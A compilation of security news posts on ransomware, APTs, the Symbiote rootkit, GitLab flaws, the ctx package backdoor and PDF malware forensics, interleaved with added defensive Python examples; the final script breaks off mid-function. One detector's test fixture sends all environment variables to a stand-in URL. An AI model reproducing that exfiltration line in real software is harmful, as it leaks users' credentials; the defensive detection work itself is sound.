The post The new version of Hello XD ransomware, developed by Russian hackers, becomes undetectable by using a backdoor appeared first on Information Security Newspaper | Hacking News.
Experts at Palo Alto Networks report that the creator of this malware variant developed a new encryptor focused on bypassing detection and changed the encryption algorithm, which has put Hello XD far ahead of Babuk and other similar malware strains and significantly increased its effectiveness.
As mentioned by Palo Alto experts, Hello XD was developed by a presumably Russian threat actor identified as X4KME, known for publishing various online tutorials for the implementation of Cobalt Strike for malicious purposes.
Unlike other ransomware operations, Hello XD does not use a site on the Tor network to publish victims’ leaked information, but instead negotiates through the TOX chat service. In addition, the latest version of the malware adds a still-in-development onion website to the ransom note shown to victims, so its intended purpose is not yet known.
In addition to the new encryptor, the developer of Hello XD included MicroBackdoor, an open-source backdoor that allows attackers to navigate the infected system, execute arbitrary commands and remove traces of malicious activity. The backdoor executable is encrypted with the WinCrypt API alongside the ransomware payload.
The payload packer, on the other hand, has two layers of obfuscation. The malware developer derived it by modifying UPX, an open-source packer widely used by other malware authors.
Decrypting the embedded blobs requires a custom algorithm that uses unconventional instructions such as XLAT, while API calls in the packer are not obfuscated. Hello XD also changed its encryption scheme from HC-128 with Curve25519-Donna to Rabbit Cipher with Curve25519-Donna.
Experts believe that the features added to the new version of Hello XD could make it one of the dominant ransomware variants over the next few months, so it is important for the cybersecurity industry to keep track of how this malware develops.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post Education and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia were being spied on since 2013 appeared first on Information Security Newspaper | Hacking News.
The main attack method, employed by this group between 2012 and 2015, involves Microsoft Office documents specially crafted for the exploitation of known vulnerabilities such as CVE-2012-0158 and CVE-2010-3333. This tactic was first detected in 2014, in a phishing campaign associated with the Advanced Persistent Threat (APT) operation known as Naikon.
SentinelLabs identified a second hacking method associated with Aoqin Dragon, based on hiding malicious executables in icons of fake antivirus products. After execution, a malware sample was delivered to the affected systems.
Starting in 2018, hackers left these tactics behind to resort to using a removable disk shortcut file; clicking this icon triggers a DLL hijack and loads an encrypted payload to deliver a backdoor. This malware runs under the name “Evernote Tray Application” and is executed at system startup; if any removable drives are detected, a copy of the payload will be created to expand the infection.
At least two backdoor variants used by this group have been identified. Known as Mongall, the first backdoor is a DLL injected into memory, protected with encryption and in constant maintenance since its launch in 2013. This backdoor profiles the host and sends the details to the C&C using an encrypted channel.
Heyoka, meanwhile, is an open-source exfiltration tool that uses spoofed DNS requests to create a two-way communication tunnel. The hackers use Heyoka to copy files off compromised devices while keeping system administrators from detecting the malicious activity in its early stages.
Aoqin Dragon is an unusual case, as it managed to go unnoticed for almost ten years. This has been possible due to the continuous evolution of its strategies and the periodic change of tactics, so it is highly likely that this cybercriminal group will change its behavior again in the near future.
The post New rootkit malware for Linux is undetectable and is quickly spreading throughout Latin America. Protect your servers before it’s too late appeared first on Information Security Newspaper | Hacking News.
The main feature of Symbiote is that it needs to infect other running processes to achieve a successful infection. Instead of using a standalone executable as a conventional malware variant would, the attackers use a shared object (SO) library that is loaded into running processes through LD_PRELOAD, thus infecting vulnerable systems.
After infecting running processes on the system, Symbiote provides its operators with rootkit functionalities, in addition to remote access and credential collection capabilities.
Researchers first detected the malware in November 2021, attributing it to hacking groups targeting the financial sector in Latin America. Once it infects a target system, Symbiote hides any hint of malicious activity, making infections virtually undetectable, even with forensic analysis techniques.
In addition to its rootkit tactics, the malware also implants a backdoor in the system so that operators can log in as any user using an encrypted password and then execute commands with high privileges.
Another interesting feature of Symbiote is its Berkeley Packet Filter (BPF) hooking functionality, used by other malware variants to conceal their C&C communications. Symbiote, however, uses BPF to hide malicious network traffic on infected systems.
If an administrator launches a packet capture tool on the affected Linux system, BPF bytecode is injected into the kernel to define which packets should be captured. Symbiote first prepends its own bytecode so that it can filter out the network traffic it wants to hide.
This malware is highly stealthy. According to experts, Symbiote is designed to be loaded through the LD_PRELOAD directive, which loads it before any other shared object. Because it loads first, it can hijack imports from the other libraries the application loads.
Symbiote uses this to hide its presence on the machine by hooking libc and libpcap functions. The following screenshot shows the various evasion tactics:
Because Symbiote works as a user-level rootkit, it can be difficult to detect an infection. Network telemetry can be used to detect anomalous DNS requests, and security tools such as antivirus must be statically linked to ensure that they are not “infected” by user rootkits. Infection vectors are still unknown, so Linux system administrators should remain vigilant for any hint of infection.
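To look for the kind of preload-based infection described above, here is an added example (not from the article or the Symbiote research) that parses /etc/ld.so.preload, each process's LD_PRELOAD environment and its memory map for shared objects loaded from outside the usual library directories; the trusted directory list and the sample /proc data are assumptions constructed for the demo.

```python
import os

# Directories where legitimately loaded shared objects normally live.
# Assumption for this example: a .so mapped from anywhere else deserves a look.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")


def preload_entries(ld_so_preload_text):
    """Return library paths listed in /etc/ld.so.preload (an empty file is clean)."""
    entries = []
    for line in ld_so_preload_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            entries.append(line)
    return entries


def preload_from_environ(environ_bytes):
    """Extract LD_PRELOAD from a /proc/<pid>/environ blob (NUL-separated)."""
    for item in environ_bytes.split(b"\0"):
        if item.startswith(b"LD_PRELOAD="):
            return item[len(b"LD_PRELOAD="):].decode(errors="replace")
    return None


def suspicious_mappings(maps_text):
    """Return file-backed .so mappings from /proc/<pid>/maps that live outside
    TRUSTED_LIB_DIRS. Anonymous regions, [heap], [stack] etc. are skipped."""
    found = set()
    for line in maps_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        path = parts[5]
        if not path.startswith("/") or ".so" not in os.path.basename(path):
            continue
        if any(path.startswith(d + "/") for d in TRUSTED_LIB_DIRS):
            continue
        found.add(path)
    return sorted(found)


def scan_live_system():
    """Walk /proc on a running Linux host and collect findings (read rights needed).

    Caveat: these reads go through libc, so a rootkit that hooks readdir/fopen
    can filter its own entries out. Run from a statically linked interpreter or
    against an offline copy of /proc and the disk to trust the result.
    """
    report = {"ld_so_preload": [], "processes": {}}
    try:
        with open("/etc/ld.so.preload") as fh:
            report["ld_so_preload"] = preload_entries(fh.read())
    except FileNotFoundError:
        pass
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/environ", "rb") as fh:
                env_hit = preload_from_environ(fh.read())
            with open(f"/proc/{pid}/maps") as fh:
                map_hits = suspicious_mappings(fh.read())
        except OSError:  # process exited or not readable by this user
            continue
        if env_hit or map_hits:
            report["processes"][int(pid)] = {"LD_PRELOAD": env_hit, "maps": map_hits}
    return report


# Constructed sample data standing in for live /proc reads.
SAMPLE_ENVIRON = b"PATH=/usr/bin\0LD_PRELOAD=/dev/shm/.lib/libudev.so.1\0HOME=/root\0"
SAMPLE_MAPS = """\
55d1c0a00000-55d1c0a1f000 r--p 00000000 fd:01 1234 /usr/bin/bash
7f2a3c000000-7f2a3c022000 r--p 00000000 fd:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f2a3c200000-7f2a3c210000 r-xp 00000000 fd:01 9012 /dev/shm/.lib/libudev.so.1
7f2a3c400000-7f2a3c401000 rw-p 00000000 00:00 0
7ffd1e000000-7ffd1e021000 rw-p 00000000 00:00 0 [stack]
"""


def demo():
    """Run the parsers over the constructed sample and return the findings."""
    return {
        "LD_PRELOAD": preload_from_environ(SAMPLE_ENVIRON),
        "maps": suspicious_mappings(SAMPLE_MAPS),
    }


if __name__ == "__main__":
    print(demo())
    if os.path.isdir("/proc"):
        print(scan_live_system())
```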
The post 8 critical vulnerabilities in GitLab would allow hackers to install backdoors in your code appeared first on Information Security Newspaper | Hacking News.
According to the report, GitLab fixed a total of eight vulnerabilities across all severity ranges, whose exploitation would have allowed threat actors to carry out multiple attack scenarios, including cross-site scripting (XSS), privilege escalation, and even the installation of backdoors in GitLab projects. The detected and addressed flaws are described below, along with their tracking key and the score assigned according to the Common Vulnerability Scoring System (CVSS).
Account takeover via SCIM email change: When group SAML SSO is configured, the SCIM feature would allow any owner of a Premium group to invite arbitrary users by username and email address, then change those users’ email addresses through SCIM to an attacker-controlled address and take over the affected accounts, since no multi-factor authentication check was enforced. The flaw received a CVSS score of 9.9/10 and was tracked as CVE-2022-1680.
Stored XSS in Jira: A stored cross-site scripting (XSS) error in Jira would allow threat actors to execute arbitrary JavaScript code in GitLab through specially crafted Jira issues. The flaw was tracked as CVE-2022-1940 and received a CVSS score of 7.7/10.
XSS attack in quick actions: The absence of input validation in quick actions would allow threat actors to exploit an XSS bug by injecting HTML into contact details. The flaw received a CVSS score of 8.7/10 and received the tracking key CVE-2022-1948.
IP allowlist bypassing when using Activation Tokens: Incorrect authorization in GitLab EE would allow threat actors to misuse an activation token from any location, even evading IP address restrictions. The flaw received a CVSS score of 6.5/10 and was tracked as CVE-2022-1935.
IP allowlist bypassing when using Project Deployment Tokens: Improper authorization in GitLab would have allowed malicious hackers using project deployment tokens to access from any location, even with IP address restrictions enabled. The flaw was tracked as CVE-2022-1936 and received a CVSS score of 6.5/10.
Incorrect authorization in Interactive Web Terminal: When the Interactive Web Terminal feature is configured, incorrect authorization would allow users with the Developer role to open terminals in running jobs of other developers, potentially exposing these jobs to hacking scenarios. The vulnerability was tracked as CVE-2022-1944 and received a CVSS score of 5.4/10.
Subgroup members can list members of the parent group: An issue in all versions of GitLab CE/EE would allow a member of a subgroup to access the list of members of its parent group. The vulnerability received a CVSS score of 4.3/10 and was tracked as CVE-2022-1821.
Group member lock bypass: Malicious group maintainers could add new members to a project within their group via REST APIs, even after group owners enable settings to prevent members from being added to projects within the group. The flaw was tracked as CVE-2022-1783 and received a CVSS score of 2.7/10.
GitLab adds that these fixes are part of its effort to maintain the highest security standards and improve the user experience. For more information, users can visit the FAQ section of GitLab, where more detailed descriptions of every single flaw and its corresponding security patches are found.
The code hosting and development service also offers its users to receive security notifications directly in their inbox through their contact page. To receive notifications of new update releases via RSS, GitLab users can subscribe to the GitLab Security Release RSS feed.
The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
As reported just a few hours ago, the package received an update, version v0.2.6, which attracted attention because ctx had not been updated in 8 years.
After the update was reflected in the GitHub repository, some researchers began analyzing the code and found some suspicious additions:
The code is crafted so that whenever a dictionary is created, all environment variables are sent to a Heroku application URL under the attackers’ control.
Experts consider this a clear sign that the current version of the package has been manipulated for malicious purposes and should not be used.
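The following is an added example (not the article's or the ctx project's code) of a static heuristic for this pattern: it walks a package's AST and flags any function that both reads the process environment and performs an outbound HTTP call. The sample source it scans is constructed to mimic the reported behaviour, and the set of environment and HTTP API names it matches is an assumption.

```python
import ast
import os

# Names whose presence in one function body, together, mark the pattern
# described above: read the environment, then push it to an HTTP endpoint.
ENV_NAMES = {"os.environ", "os.getenv", "environ", "getenv"}
NET_NAMES = {"requests.get", "requests.post", "urllib.request.urlopen", "urlopen",
             "httpx.get", "httpx.post", "http.client.HTTPSConnection"}


def dotted_name(node):
    """Turn an Attribute/Name chain such as `os.environ` into 'os.environ'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_exfil_functions(source, filename="<package>"):
    """Return (function name, line) for each function that both reads environment
    variables and makes an outbound HTTP call. Nested functions are attributed to
    their enclosing function as well, which is acceptable for triage."""
    tree = ast.parse(source, filename)
    hits = []
    for func in ast.walk(tree):
        if not isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        reads_env = calls_net = False
        for node in ast.walk(func):
            if isinstance(node, ast.Call):
                name = dotted_name(node.func)
                calls_net |= name in NET_NAMES
                reads_env |= name in ENV_NAMES
            elif isinstance(node, ast.Attribute):
                reads_env |= dotted_name(node) in ENV_NAMES
        if reads_env and calls_net:
            hits.append((func.name, func.lineno))
    return hits


def scan_package(root):
    """Walk an unpacked package (e.g. an sdist) and report every hit per file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".py"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                try:
                    hits = find_exfil_functions(fh.read(), path)
                except SyntaxError:
                    continue
            if hits:
                findings[path] = hits
    return findings


# Constructed stand-in for the reported behaviour (not the real ctx code):
# building the dict-like object ships the whole environment to a remote URL.
SUSPECT_SOURCE = '''
import os
import requests

class Ctx(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        requests.get("https://example.invalid/collect", params=dict(os.environ))

def home():
    return os.getenv("HOME")   # reads env but never phones home: not flagged
'''

# Constructed benign code: a network call that never touches the environment.
CLEAN_SOURCE = '''
import requests

def fetch(url):
    return requests.get(url, timeout=5).text
'''

if __name__ == "__main__":
    print(find_exfil_functions(SUSPECT_SOURCE))   # [('__init__', 6)]
    print(find_exfil_functions(CLEAN_SOURCE))     # []
```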
Other versions of a ‘phpass’ fork, published in the Packagist repository, were also manipulated to add this malicious code. PHPass has reportedly been downloaded about 2.5 million times.
According to security researcher Somdev Sangwan, the insertion of this backdoor could be aimed at extracting access credentials for Amazon Web Services (AWS).
The malicious version was released on May 14, so users who installed the package before that date are employing the original version (v0.1.2) and will not be affected by this issue. On the other hand, any installation of ctx Python after May 14 could include malicious code.
About the attack method, specialists mention that the domain name of the original maintainers of ctx Python expired, which would have allowed the attackers to register it again and take control of this package, adding the malicious payload for later distribution.
The official page of the ctx Python project in PyPI has been removed, showing the error ‘Not Found’ to visitors.
The post 2 critical vulnerabilities in the Linux operating system allow backdoors to be installed with root privileges appeared first on Information Security Newspaper | Hacking News.
Nimbuspwn refers to the CVE-2022-29799 and CVE-2022-29800 flaws, which reside in networkd-dispatcher, a component that dispatches network connection state changes on Linux machines. The flaws were discovered during an analysis of messages on the system bus, which led to a review of the code flow of networkd-dispatcher.
Microsoft researcher Jonathan Bar Or notes that this set of flaws involves path traversal errors, symbolic link race conditions, and time-of-check to time-of-use (TOCTOU) race conditions. Additionally, during analysis it was observed that the networkd-dispatcher daemon runs with root privileges at system boot.
Microsoft discovered that the daemon used a method called “_run_hooks_for_state” to discover and run scripts based on the state of the detected network.
The logic of this method includes returning executable scripts owned by the root user and the root group from the directory corresponding to that state. The method executes each script in that location using subprocess.Popen, supplying custom environment variables.
The execution of “_run_hooks_for_state” is what leads to the appearance of these security problems, as reported by Microsoft. Exploitation of Nimbuspwn would allow a threat actor with reduced privileges on the affected Linux system to escalate their privileges to the root level by sending arbitrary signals.
A description of the steps for a successful exploitation is shown in the following diagram, divided into three attack steps:
Microsoft specifies that successful exploitation requires planting various files on the affected system.
The report concludes by noting that there are many environments where the attack is feasible, including Linux Mint, because the systemd-networkd service, which normally holds the bus name “org.freedesktop.Network1”, is not started on boot by default.
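As an added example (not networkd-dispatcher's code or Microsoft's write-up), the hook-discovery step can be written so that each of the three bug classes named above is closed: the state name is validated before it is joined to a path, candidate scripts are opened with O_NOFOLLOW and inspected through the open descriptor, and only owner-matched, non-writable, executable regular files are returned. It targets Linux; the hook directory layout and file names are assumptions for the demo, and the demo compares ownership against the current user because it cannot create root-owned files.

```python
import os
import re
import stat
import tempfile

# A state name must be a plain token: no "/", "..", NUL or other path syntax.
STATE_RE = re.compile(r"^[a-z][a-z0-9-]{0,31}$")


def valid_state(state):
    """Path-traversal guard: only accept a bare state token such as 'routable'."""
    return bool(STATE_RE.match(state))


def hook_scripts(hook_root, state, owner_uid=0, owner_gid=0):
    """Return (name, fd) pairs for scripts that are safe to run for `state`.

    The caller should execute each script through its descriptor (fexecve or
    /proc/self/fd/N) so the object that was checked is the object that runs;
    re-opening by path would reintroduce the TOCTOU window.
    """
    if not valid_state(state):
        raise ValueError(f"invalid state name: {state!r}")
    state_dir = os.path.join(hook_root, f"{state}.d")
    try:
        dir_fd = os.open(state_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except FileNotFoundError:
        return []
    accepted = []
    try:
        for name in sorted(os.listdir(dir_fd)):
            try:
                # O_NOFOLLOW: a symlink planted here fails with ELOOP instead of
                # being followed to a file the attacker controls.
                fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC,
                             dir_fd=dir_fd)
            except OSError:
                continue
            st = os.fstat(fd)  # inspect the opened object, never the path
            ok = (stat.S_ISREG(st.st_mode)
                  and st.st_uid == owner_uid and st.st_gid == owner_gid
                  and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
                  and st.st_mode & stat.S_IXUSR)
            if ok:
                accepted.append((name, fd))
            else:
                os.close(fd)
    finally:
        os.close(dir_fd)
    return accepted


def demo():
    """Constructed hook tree: only the non-writable, executable regular file
    owned by the expected user should survive the checks."""
    root = tempfile.mkdtemp(prefix="hooks-")
    d = os.path.join(root, "routable.d")
    os.mkdir(d)

    def write(name, mode):
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hook\n")
        os.chmod(path, mode)
        return path

    good = write("10-good.sh", 0o700)
    write("20-world-writable.sh", 0o777)        # rejected: others can edit it
    write("40-not-executable.sh", 0o600)        # rejected: no exec bit
    os.symlink("/bin/sh", os.path.join(d, "30-symlink.sh"))  # rejected: ELOOP
    st = os.stat(good)                          # demo owner; gid varies by platform
    found = hook_scripts(root, "routable", st.st_uid, st.st_gid)
    names = [name for name, _ in found]
    for _, fd in found:
        os.close(fd)
    return names


if __name__ == "__main__":
    print(demo())                 # ['10-good.sh']
    print(valid_state("../etc"))  # False
```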
The post Advance NSA backdoor detected in 245 organizations in 45 countries including China, India and Mexico appeared first on Information Security Newspaper | Hacking News.
The first reports indicated that only one antivirus engine was able to detect a sample of Bvp47, although in the hours since, more indicators of compromise have become known, which will considerably improve detection of this threat.
The backdoor was first identified by Chinese security firm Pangu Lab, which describes it as an advanced development for Linux with remote access capabilities protected through an RSA asymmetric cryptography algorithm, which requires a private key to activate. This malware would have impacted almost 300 organizations in 45 countries, going unnoticed for almost 10 years.
This private key was found in leaks published by the Shadow Brokers, alongside other hacking tools and zero-day exploits used by Equation Group. The backdoor could also operate on major Linux distributions, including JunOS, FreeBSD, and Solaris.
A subsequent automated analysis appears to confirm the authorship of Bvp47, as it shares multiple features with another backdoor developed by Equation Group. According to Kaspersky experts, this backdoor shares 30% of its code strings with other malware identified in 2018 and available in VirusTotal databases.
On the Bvp47 attack, the researchers point out that the threat actors control 3 servers: one responsible for the external attacks and two internal machines, an email server and a business server.
The attackers establish a connection between the external server and the email server via a TCP SYN packet with a 264-byte payload. The email server then connects to the business server’s SMB service to perform sensitive operations, including running PowerShell scripts.
The business server then connects back to the email server to download additional files, including the PowerShell script and the encrypted second-stage data. The connection between the internal machines carries encrypted data over a specialized protocol.
The post Squirrelwaffle malware takes control of vulnerable Microsoft Exchange servers to spread banking scam appeared first on Information Security Newspaper | Hacking News.
About Squirrelwaffle, the researchers mention that this is a malware loader distributed as a malicious Microsoft Office document in spam campaigns. This tool allows threat actors to gain access to the victim’s system and facilitates the delivery of malware variants for later attack stages, including phishing and banking fraud.
If a target user opens an email with an infected attachment and enables macros, a Visual Basic script is executed for the Cobalt Strike Beacons download, giving hackers full control of the vulnerable system.
Although this is a well-known hacking variant, Squirrelwaffle’s latest operation stands out on its own merits. While conventional attacks are cut short by applying security updates, the use of email threads in this last incident allowed hackers to maintain the attack persistently, so not even the application of security patches stopped the intrusion.
Using the information contained in these emails, the hackers registered a web domain deceptively similar to a legitimate platform, using a small misspelling to avoid detection. Taking the conversation out of the victim’s email infrastructure allowed the attackers to calmly carry out the rest of the process.
The next step only involved sending malicious emails to the conversation, trying to trick finance employees into making transfers to bank accounts controlled by the hackers. The use of other methods, such as creating more deceptive domains, made this deception almost undetectable, as seen below:
In a supposed follow-up email included in the thread, reference is made to the new bank details and an attempt is made to create a sense of urgency in the minds of the targeted employees. In the operation detected by Sophos, the threat actors kept pushing for the bank transfer by sending fake urgent messages.
After days of pressure, the hackers were finally told that the payment was being processed.
According to Sophos, the theft was about to take place, although one of the financial institutions involved detected signs of electronic fraud and the transfer was interrupted.
This is an even more complex variant of a known attack, so it is necessary to take action on it. To begin with, it is best to apply all the updates available for your system, in addition to applying email security policies that help prevent members of an organization from interacting with malicious content.
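As an added example (not from Sophos or the article), the following defensive check flags sender domains that are small misspellings or look-alike substitutions of an organization's trusted domains, the tactic used in the thread hijack described above; the trusted list, the sample headers and the substitution table are constructed assumptions.

```python
import re

# Common substitutions that fool a quick glance; both sides are normalised
# the same way, so legitimate domains containing "rn" still compare equal.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"),
              ("1", "l"), ("3", "e"), ("5", "s")]
ADDR_DOMAIN = re.compile(r"@([A-Za-z0-9.-]+)")


def normalise(domain):
    """Lower-case and collapse look-alike character pairs."""
    d = domain.lower().strip(".")
    for bad, good in HOMOGLYPHS:
        d = d.replace(bad, good)
    return d


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute and a
    swap of adjacent characters each cost 1 (catches 'examlpe' for 'example')."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def registrable(domain):
    """Last two labels only. Demo simplification: real code should consult the
    Public Suffix List so that host.example.co.uk reduces to example.co.uk."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def lookalike(sender_domain, trusted, max_distance=2):
    """Return (trusted domain, distance) when the sender domain is a near-miss
    of a trusted one, or None when it is exact or clearly unrelated.
    max_distance=2 suits domains of 8+ characters; tighten it for short ones."""
    cand = registrable(sender_domain)
    if cand in trusted:
        return None
    n = normalise(cand)
    best = None
    for t in trusted:
        dist = osa_distance(n, normalise(t))
        if dist <= max_distance and (best is None or dist < best[1]):
            best = (t, dist)
    return best


def scan_from_headers(headers, trusted):
    """Run the check over From: header lines; returns [(header, trusted, dist)]."""
    hits = []
    for h in headers:
        m = ADDR_DOMAIN.search(h)
        if not m:
            continue
        verdict = lookalike(m.group(1), trusted)
        if verdict:
            hits.append((h, verdict[0], verdict[1]))
    return hits


# Constructed demo data: the organisation's own domain and a supplier's.
TRUSTED = {"example.com", "supplier-invoices.net"}
SAMPLE_HEADERS = [
    "From: Accounts <ap@supplier-invoices.net>",        # legitimate
    "From: Accounts <ap@mail.supplier-invoices.net>",   # legitimate subdomain
    "From: Accounts <ap@suppller-invoices.net>",        # i -> l
    "From: Finance <finance@exarnple.com>",             # rn -> m
    "From: Newsletter <news@unrelated-shop.org>",       # unrelated
]

if __name__ == "__main__":
    for hit in scan_from_headers(SAMPLE_HEADERS, TRUSTED):
        print(hit)
```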
The post APT group TA2541 has been targeting thousands of organizations across aviation, aerospace, transportation, manufacturing, and defense industries worldwide appeared first on Information Security Newspaper | Hacking News.
Unlike other similar groups, TA2541 does not usually use current events, topics of general interest or false promotions to attract potential victims. Instead, this group draws on topics related to transportation, aviation, commercial flights, tourism, and the airline industry in general. This campaign has been detected in countries in North America, Europe, Asia and the Middle East.
Below we can see an example of the emails sent by these hackers:
Proofpoint researchers found that the emails used by this group contained a Google Drive URL redirecting affected users to an obfuscated Visual Basic Script (VBS) file; when executed, it extracts an executable from text hosted on platforms such as Pastetext or GitHub.
Hackers run PowerShell on various Windows processes and query Windows Management Instrumentation (WMI) to search for security products on the affected system and try to disable them. Finally, hackers will collect information from the affected system before installing the RAT.
In addition to Google Drive, the threat actors also use Discord links that redirect users to compressed files containing AgentTesla or Imminent Monitor. TA2541 has also delivered email attachments with embedded executables that contain the malicious URL.
VBS files are used to establish persistence for an AsyncRAT payload by adding the VBS file to the home directory pointing to a PowerShell script.
Experts also report that TA2541 has used more than a dozen different malware payloads since it emerged on the cybercriminal scene. The group has always relied on commodity malware sold on criminal forums or available in code repositories. While it currently mainly uses AsyncRAT, it has also used other variants such as NetWire, Parallax or WSH RAT.
Given the characteristics of the malware variants used by this group, the researchers believe that these campaigns have as their main purpose the collection of information and remote access to infected systems. However, the researchers have not been able to confirm what the real goals of this group are.
This group has been a constant threat for the past few years and is highly likely to remain so in the medium term, so system administrators will need to remain alert to any potential attack attempts related to TA2541.
The post Clients using Magento 1 e-commerce platform are getting hacked appeared first on Information Security Newspaper | Hacking News.
This wave of attacks was reported this week by security firm Sansec, which released a report revealing that hundreds of stores were compromised by a skimming tool loaded from the domain naturalfreshmall.com.
The company asked victims to contact their support area to find a common entry point and protect other traders against a potential new attack. Adobe also mentions that the first stage of investigation has already been completed, so it is known that the attackers used a combination of SQL injection and PHP object injection (POI) to take control of the vulnerable software.
It is important to remember that Adobe has stopped supporting Magento software, although this has not been an impediment for thousands of e-commerce websites to continue using it.
By analyzing one of the intrusions in detail, the researchers found that the attackers left 19 backdoors on the target system, so they recommended victims use a malware scanning solution to identify all instances of malicious files or compromised Magento code.
Since its launch, Magento has created constant problems for Adobe and its thousands of users. At the end of 2021, cybersecurity specialists reported that more than 4,000 online stores would have been compromised by hacking groups exploiting known vulnerabilities in Magento, which would have represented losses of hundreds of thousands of dollars.
In addition, in 2020 Sansec also reported hundreds of attacks against Magento online stores, while by then Adobe already foresaw massive attacks against Magento 1.x implementations, although they were confident that versions 2.x could be considered safe.
The post Hackers are mailing ransomware-infected USB devices to employees of hundreds of companies to take control of their networks appeared first on Information Security Newspaper | Hacking News.
The cybercriminals reportedly used the U.S. Postal Service (USPS) and the United Parcel Service (UPS) network to ship BadUSB or Bad Beetle USB devices, used to obtain an entry point into potentially affected organizations.
The agency details how the attackers posed as Amazon and the U.S. Department of Health and Human Services (HHS), tricking affected users into opening the packages and connecting the devices to their work computers.
To get users to connect the USB device, hackers pretend they contain government files on COVID-19 measures, or fake gift cards for online services.
When victims connect these devices to their computers, the device registers itself as a Human Interface Device (HID) keyboard, so the system treats it as an input device rather than as storage. Once registered, it injects keystrokes to install malware payloads.
As mentioned above, the main goal of this campaign is to deploy various ransomware variants on the affected systems. To do this, the hackers use tools such as Metasploit, Cobalt Strike, the Griffon backdoor and some PowerShell scripts, in addition to ransomware variants such as BlackMatter and REvil. At the moment the real scope of the attack is unknown, although it is not ruled out that hundreds of organizations are affected.
This report follows an FBI disclosure of an operation in which FIN7 posed as Best Buy to send similar packages with malicious flash drives through USPS to hotels, restaurants and retailers. Reports of such attacks began to emerge in February 2020 and have stretched on for nearly two years.
The post How to perform digital forensics of malicious PDF files? Easily checking if a PDF document has malware or backdoors appeared first on Information Security Newspaper | Hacking News.
This time, specialists from the International Institute of Cyber Security (IICS) will show you how to apply digital forensics to analyze PDF documents and determine whether they are compromised with any variant of malicious content.
Before going on, it is worth recalling that the attack chain via PDF usually begins with malicious documents sent by email. When these documents are opened on the affected system, in most cases JavaScript code is executed in the background, capable of exploiting vulnerabilities in tools such as Adobe PDF Reader or dropping executable files for later attack stages.
PDF documents, whether legitimate or malicious, have 4 main elements, according to digital forensics experts:
Now that we know the essential information about an attack via PDF documents, we can review the tools used to analyze each of these elements.
PDFiD is a component of Didier Stevens Suite capable of scanning PDF documents using a string list to detect JavaScript elements, embedded files, actions when opening files, and counting specific lines in a document.
In this example, we can see that PDFiD detected various objects, streams, JavaScript code, and OpenAction elements in the Report.pdf file. According to digital forensics experts, the presence of these elements suggests that the analyzed file contains JavaScript or Flash scripts. The /Embedded element indicates the presence of other formats within the PDF, while the /OpenAction, /AA, and /AcroForm elements trigger automatic actions when the file is opened.
We already know that there is JavaScript code inside the parsed PDF file. This will be the starting point of the research; to find an indirect JavaScript object, run the pdf-parser.py tool.
Based on the result of these scans, the hidden JavaScript code will execute the malware every time the file is opened, so the next step is to extract the malicious payload.
peepdf is a Python tool that contains all the necessary components for validating and analyzing PDF files, according to digital forensics experts. To take full advantage of its capabilities, enter the command peepdf -i file_name.pdf. The -i option enables the script’s interactive mode:
To see more features, use the --help option:
The scan result indicates that there is a file embedded in object 14. A closer inspection of this object shows that it points to object 15, which in turn points to object 16. Finally, there are indications that object 17 contains a malicious file.
According to the content of the PDF, there is only one stream in it, and it also points to object 17. Therefore, object 17 is a stream with an embedded file.
Stream 17 contains a file signature that begins with MZ (hexadecimal 4d 5a). According to digital forensics experts, this is the signature of an executable file.
Next, we save the stream as an executable named virus.exe.
Run the file in an isolated virtual machine with a 32-bit Windows 7 system.
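The pdfid keyword triage and the stream-extraction check above can be reproduced in a few lines. This is an added example, not pdfid, pdf-parser or peepdf: it counts the risky keywords, de-obfuscates #xx-escaped names, decodes FlateDecode streams and reports any stream starting with the MZ signature; the PDF it scans is a constructed, non-functional sample, and only the FlateDecode filter is handled.

```python
import re
import zlib

# Keywords pdfid-style triage cares about: script, auto-run actions, attachments.
RISKY = ["/JS", "/JavaScript", "/OpenAction", "/AA", "/AcroForm",
         "/EmbeddedFile", "/Launch", "/RichMedia", "/ObjStm"]
NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]+")
# "N G obj << dict >> stream ... endstream"; the tempered dot keeps the dict
# match from running past an "endobj" into the next object.
STREAM_OBJ = re.compile(
    rb"(\d+)\s+\d+\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\nendstream",
    re.S)


def normalise_name(raw):
    """Decode #xx escapes so an obfuscated /Java#53cript counts as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def keyword_counts(pdf):
    """Count risky name tokens plus objects and streams, like pdfid does."""
    counts = {k: 0 for k in RISKY}
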